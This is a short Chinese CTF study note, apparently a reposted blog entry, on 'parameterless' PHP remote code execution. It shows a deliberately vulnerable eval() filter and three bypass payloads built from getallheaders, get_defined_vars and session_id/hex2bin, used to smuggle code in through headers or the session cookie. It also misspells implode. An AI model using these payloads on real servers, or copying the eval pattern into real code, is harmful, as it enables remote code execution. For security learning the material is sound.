无参数rce

无参指的是所用的函数都不带参数   关键代码与下面类似

<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['exp'])) {
eval($_GET['exp']);
}
?>

这里学习了一些方式：

1、getallheaders()

构造payload：eval(imlode(getallheaders()));

eval（）把（）内字符串当php代码执行

impload（）将一个一维数组转化成字符串

getallheaders（）以数组的形式返回所有http头信息

返回信息从请求头的最后往上输出，所以可以在请求头的最后加入我们的恶意代码，再加上注释符将后面的内容注释掉

 

 

2、get_defined_vars()

构造payload：eval(end(current(get_defined_vars())));

 因为get传进的参数回放在数组的最后，所以利用end函数来定位

get_defined_vars()用于返回一个二维数组来显示所有已定义的变量，因为是二维数组，所以没法用impload（）函数

要使用current（）函数返回该二维数组的第一个一维数组

 

3.session_id

payload: eval(hex2bin(session_id(session_start())));

 

 

 

如图，将所需要传入的恶意代码加密成16进制并修改phpsessid

 

• highlight_file() 函数对文件进行语法高亮显示，本函数是show_source() 的别名  可以将php文件读出，获取flag

标签：函数,vars,get,session,参数,数组,eval,rce
来源： https://www.cnblogs.com/heartbeat111/p/16518720.html